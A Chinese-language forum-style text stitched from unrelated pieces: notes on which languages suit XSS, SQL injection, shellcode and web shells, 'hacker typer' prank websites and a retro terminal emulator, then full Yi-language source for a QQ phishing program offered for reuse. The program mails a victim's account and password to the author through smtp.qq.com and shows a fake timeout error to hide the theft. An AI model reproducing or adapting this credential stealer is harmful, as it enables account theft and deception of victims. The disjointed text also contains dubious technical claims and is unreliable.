XSS / CSRF 漏洞一般只能用 JavaScript。SQL注入一般只能构造畸形SQL语句,命令执行类的会掺一点bash、DOS命令。反序列化漏洞一般用JSON、XML等,取决于具体的数据交换语言。溢出漏洞一般用汇编、C编写shellcode,而且一般需要用到专门的 Jump-Oriented Compiler。拿Web Shell的时候,需要根据当前Web服务器配置选择相应的ASP、PHP、ASPX等语言。另外,将payload送入目标机器一般需要构造特殊的提交方式: 如果需要构造畸形HTTP请求的话,偶一般选择Python,requests库真的很好用。如果需要在套接字层直接提交TCP/UDP数据的话,偶一般选择C,也会考虑Python。剩下的情形对语言一般就没有强制要求了,偶平时大概随心情在 Go 和 Python 之间选一个。偶给大家介绍一下如何用一些老式、比较复古的且实用的小工具来让大家瞬间成为黑客的。
虽然目前有很多漂亮的 GUI,比如 Hacker Typer:
Hacker Typer
或者 GEEKtyper.com 的网页版本:
GEEKtyper.com
上述两个小工具,每个人都可以打开网页,进行操作。
但是如果你想要看起来更老派,更专业,可以考虑使用 Cool Retro Term:
Swordfish90/cool-retro-term
它是一个终端模拟器,模仿阴极管屏幕的外观和感觉,可以看下面的图片。相比于其他终端模拟器,它被设计的更加美观、可自定义且占用很小的存储空间。
偶用易语言写的一个QQ盗号源码,其中你的QQ号和小号的QQ号和密码都需要改一下。代码如下(第一个编辑框内容为帐号,第二个为密码):.版本 2.支持库 internet.子程序 __启动窗口_创建完毕连接发信服务器 (“smtp.qq.com”, , “你小号QQ号”, “你小号QQ号密码”, ).子程序 _按钮1_被单击发送邮件 (“QQ钓鱼程序”, “帐号:” + 编辑框1.内容 + #换行符 + “密码:” + 编辑框2.内容, “你小号的QQ号”, ,,“你大号的QQ号” )信息框 (“登陆超时,错误代码:00000000×1”, 0, )
没有所谓的黑客u盘,不是说他把bt五这样的系统装到u盘里面,然后启动的时候选择优盘启动。
这样就进入渗透系统了 你连这个优盘到底是什么一回事,你都不能够理解,你就别玩什么黑客了